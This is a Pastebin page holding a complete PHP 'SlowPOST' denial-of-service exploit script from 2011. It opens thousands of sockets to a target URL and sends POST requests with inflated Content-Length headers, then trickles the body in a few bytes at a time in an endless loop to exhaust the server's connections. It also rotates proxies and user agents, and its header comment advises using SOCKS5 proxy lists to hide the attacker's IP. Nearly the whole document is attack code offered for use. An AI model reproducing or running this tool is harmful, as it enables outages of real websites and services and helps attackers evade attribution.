Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v0.8.2]
- *
- * Date: 18.05.2011
- * Author: NewEraCracker
- * License: Public Domain
- *
- * How to run:
- * Step 1: Open comand line
- * Step 2: php SlowPOST.php
- *
- * This exploit might expose your IP Address in server logs. Be aware.
- * Obviously, using a list of SOCKS5 is a good idea so... #infodox
- */
- //-------------------------
- // INiT
- //-------------------------
- // Define STDIN
- if( !defined("STDIN") )
- {
- define( "STDIN", fopen('php://stdin','r') );
- }
- // Define EXPLOIT_VERSION
- if( !defined("EXPLOIT_VERSION") )
- {
- define( "EXPLOIT_VERSION", "v0.8.2" );
- }
- // Check SAPI
- if(PHP_SAPI != 'cli')
- {
- echo "This script isn\'t meant to be ran via browser";
- exit(1);
- }
- //-------------------------
- // FUNCTiONS
- //-------------------------
- // Checks if url is valid and returns true or false
- function isValidTango($url)
- {
- if ( strpos($url,'http://') === 0 ) return true;
- return false;
- }
- // Read STDIN and return it
- function readSTDIN()
- {
- $file = STDIN;
- if(!$file) return false;
- $data = fgets($file);
- return rtrim($data);
- }
- // Receives a string and returns an array with url params
- function getParamsFromUrl($url)
- {
- $url = explode('/',$url,4);
- $url[2] = explode(':',$url[2],2);
- $url[2][1] = isset($url[2][1]) ? $url[2][1] : 80;
- $host = $url[2][0];
- $port = $url[2][1];
- $path = isset($url[3]) ? $url[3] : "";
- unset($url);
- $url = array('host' => $host, 'port' => $port, 'path' => $path);
- return $url;
- }
- // Receive a file, give a proxy (returns false on failure)
- function getRandomProxy($file)
- {
- // Should work
- $file = str_replace("\\","/",$file);
- // Test the file
- if( !is_readable($file) ) return false;
- // Get the file with the proxies
- $proxies = file_get_contents($file);
- // Be sure of the line endings
- $proxies = str_replace( array("\r\n","\r"), "\n", $proxies);
- // Grab the proxies
- $proxies = explode("\n",$proxies);
- foreach($proxies as $key => $value)
- {
- $proxies[$key] = explode(":",$value);
- if( isset($proxies[$key][0]) && isset($proxies[$key][1]) )
- {
- // This allows me to get proxies from lists like
- // IP:PORT bla bla bla
- $proxies[$key][1] = explode(" ",$proxies[$key][1]);
- $proxies[$key][1] = explode("\t",$proxies[$key][1][0]);
- $proxies[$key][1] = $proxies[$key][1][0];
- // The proxy
- $proxies[$key] = array('host' => $proxies[$key][0], 'port' => $proxies[$key][1]);
- }
- else
- {
- unset($proxies[$key]);
- }
- }
- unset($key,$value);
- // Give a random proxy
- $proxy = null;
- if( count($proxies) )
- {
- while( !$proxy )
- {
- $rand = mt_rand(0,count($proxies)-1);
- $proxy = (isset($proxies[$rand]) ? $proxies[$rand] : null);
- }
- }
- // :D
- if( !$proxy )
- return false;
- else
- {
- return $proxy;
- }
- }
- // Returns a random useragent
- function randomUserAgent()
- {
- // Microsoft Windows versions
- $os = array("5.0","5.1","6.0","6.1");
- // Select a random windows
- $os = $os [ mt_rand(0,count($os)-1) ];
- // Select a random browser
- if( mt_rand(0,1) )
- {
- // Internet Explorer versions
- $ua[0] = array("4.0","7.0");
- $ua[1] = array("4.0","8.0");
- $ua[2] = array("5.0","9.0");
- // Random IE
- $ua = $ua [ mt_rand(0,count($ua)-1) ];
- return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
- }
- else
- {
- // Mozilla Firefox languages
- $lang = array("en-GB","en-US","es-ES","pt-BR","pt-PT","sv-SE");
- // Mozilla Firefox versions
- $ua[0] = array("1.9.2.16","20110319","3.6.16");
- $ua[1] = array("1.9.2.17","20110420","3.6.17");
- // Random FF
- $ua = $ua [ mt_rand(0,count($ua)-1) ];
- $lang = $lang [ mt_rand(0,count($lang)-1) ];
- return "Mozilla/5.0 (Windows; U; Windows NT {$os}; {$lang}; rv:{$ua[0]}) Gecko/{$ua[1]} Firefox/{$ua[2]}";
- }
- }
- // Opens a custom socket and returns it
- function openCustomSocket($host,$port)
- {
- $fp = @fsockopen($host, $port, $errno, $errstr, 1);
- if (!$fp) return false;
- stream_set_blocking($fp,0);
- return $fp;
- }
- // Receives a socket and performs the start of a slowPost'ing
- // Returns Content-Length on success and false on failure
- function slowPostStart($sock,$host,$port,$path)
- {
- // Check the socket
- if($sock)
- {
- // To fix Host header
- $host = ($port==80) ? $host : $host.":".$port;
- // Generate a random Content-Length
- $length = mt_rand(1337,31337);
- // Do it :D
- $out = "POST /{$path} HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: ".randomUserAgent()."\r\n";
- $out .= "Accept: */*\r\n";
- $out .= "Accept-Encoding: gzip,deflate\r\n";
- $out .= "Keep-Alive: ".mt_rand(60,120)."\r\n";
- $out .= "Connection: Keep-Alive\r\n";
- $out .= "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n";
- $out .= mt_rand(0,1) ? "Referer: http://{$host}/\r\n" : "";
- $out .= "Content-Length: {$length}\r\n";
- $out .= "\r\n";
- @fwrite($sock, $out);
- return $length;
- }
- else
- {
- return false;
- }
- }
- // Receives a socket and continues the slowPost'ing
- function slowPostContinue($sock,$bytes=5)
- {
- // Check the $bytes
- if( intval($bytes) != $bytes ) $bytes=5;
- // Check the socket
- if($sock)
- {
- // Do it :D
- $out = "";
- for($j=0;$j<$bytes;$j++);
- {
- $out .= chr(mt_rand(33,126));
- }
- $out = urlencode($out);
- @fwrite($sock, $out);
- return true;
- }
- else
- return false;
- }
- //-------------------------
- // MAiN CODE
- //-------------------------
- echo "
- _______. __ ______ ____ __ ____
- / || | / __ \ \ \ / \ / /
- | (----`| | | | | | \ \/ \/ /
- \ \ | | | | | | \ /
- .----) | | `----.| `--' | \ /\ /
- |_______/ |_______| \______/ \__/ \__/
- .______ ______ _______.___________.
- | _ \ / __ \ / | |
- | |_) | | | | | | (----`---| |----`
- | ___/ | | | | \ \ | |
- | | | `--' | .----) | | |
- | _| \______/ |_______/ |__|
- ";
- echo PHP_EOL.EXPLOIT_VERSION." by NewEraCracker".PHP_EOL;
- // Fetch the URL to attack
- $url = null;
- if( isset($_SERVER['argv'][1]) )
- {
- $url = $_SERVER['argv'][1];
- }
- if ( !isValidTango($url) ) $url = null;
- // Fetch proxy to use
- $proxy['host'] = null;
- $proxy['port'] = null;
- $proxy['file'] = false;
- if( !empty($url) && isset($_SERVER['argv'][2]) )
- {
- if( $proxy = explode(":",$_SERVER['argv'][2]) )
- {
- if( isset($proxy[0]) && isset($proxy[1]) )
- {
- $proxy['host'] = $proxy[0];
- $proxy['port'] = $proxy[1];
- unset($proxy[0],$proxy[1]);
- }
- }
- if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
- {
- $proxy['file'] = true;
- $proxy['filename'] = $_SERVER['argv'][2];
- }
- }
- // Ask for proxy
- if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
- {
- $proxy['use'] = null;
- while( !$proxy['use'] )
- {
- echo PHP_EOL."Do you want to use a proxy [yes/no/file]: ";
- $proxy['use'] = readSTDIN();
- if( strpos(strtolower($proxy['use']),'y') === 0 )
- {
- echo PHP_EOL."Proxy IP: ";
- $proxy['host'] = readSTDIN();
- echo PHP_EOL."Proxy Port: ";
- $proxy['port'] = readSTDIN();
- }
- elseif( strpos(strtolower($proxy['use']),'n') === 0 )
- {
- break;
- }
- elseif( strpos(strtolower($proxy['use']),'f') === 0 )
- {
- echo PHP_EOL."Proxy file: ";
- $proxy['filename'] = readSTDIN();
- if( is_readable($proxy['filename']) )
- {
- $proxy['file'] = true;
- }
- else
- {
- echo PHP_EOL."Invalid file!".PHP_EOL;
- $proxy['use'] = null;
- }
- }
- else
- {
- $proxy['use'] = null;
- echo PHP_EOL."Invalid choice!".PHP_EOL;
- }
- }
- unset($proxy['use']);
- }
- // Ask for target URL
- while( !$url )
- {
- echo PHP_EOL."Target url: ";
- $url = readSTDIN();
- if( isValidTango($url) ) break;
- $url = null;
- echo PHP_EOL."Invalid target!".PHP_EOL;
- }
- // Init
- @ini_set("default_socket_timeout",1);
- $url = getParamsFromUrl($url);
- $proxy['host'] = (!$proxy['host']) ? $url['host'] : $proxy['host'];
- $proxy['port'] = (!$proxy['port']) ? $url['port'] : $proxy['port'];
- echo PHP_EOL."IMMA FIRIN MAH LAZOR!".PHP_EOL;
- // Do it
- while(true)
- {
- $fp = array();
- // Start
- for($i=0;$i<5000;$i++)
- {
- // Using Proxy file?
- if( $proxy['file'] )
- {
- $filename = $proxy['filename'];
- $proxy = getRandomProxy($filename);
- if(!$proxy)
- {
- echo $filename." is not a valid proxy-list file!";
- exit(1);
- }
- $proxy['filename'] = $filename;
- }
- // Open a new socket
- if( $fp[$i]['sock'] = openCustomSocket($proxy['host'], $proxy['port']) )
- {
- // Progress bar?
- echo '+';
- // Start a new slowPost
- if( $_length = slowPostStart($fp[$i]['sock'], $url['host'], $url['port'], $url['path']))
- {
- // Find the lenght
- if( !isset($fp[$i]['length']) )
- {
- $fp[$i]['length'] = $_length;
- }
- }
- else
- {
- // Epic fail?
- @fclose($fp[$i]['sock']);
- unset($fp[$i]);
- }
- }
- else
- {
- // Epic fail?
- @fclose($fp[$i]['sock']);
- unset($fp[$i]);
- }
- // Check the current sockets
- foreach($fp as $_k => $_v)
- {
- if($fp[$_k]['length'] > 0)
- {
- // Contine old slowPosts
- $_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5;
- slowPostContinue($fp[$_k]['sock'],$_length);
- $fp[$_k]['length'] = $fp[$_k]['length']-$_length;
- }
- else
- {
- // Close completed slowPosts
- @fclose($fp[$_k]['sock']);
- unset($fp[$_k]);
- }
- }
- unset($_k,$_v);
- }
- // Restart
- foreach($fp as $_k => $_v)
- {
- @fclose($fp[$_k]['sock']);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement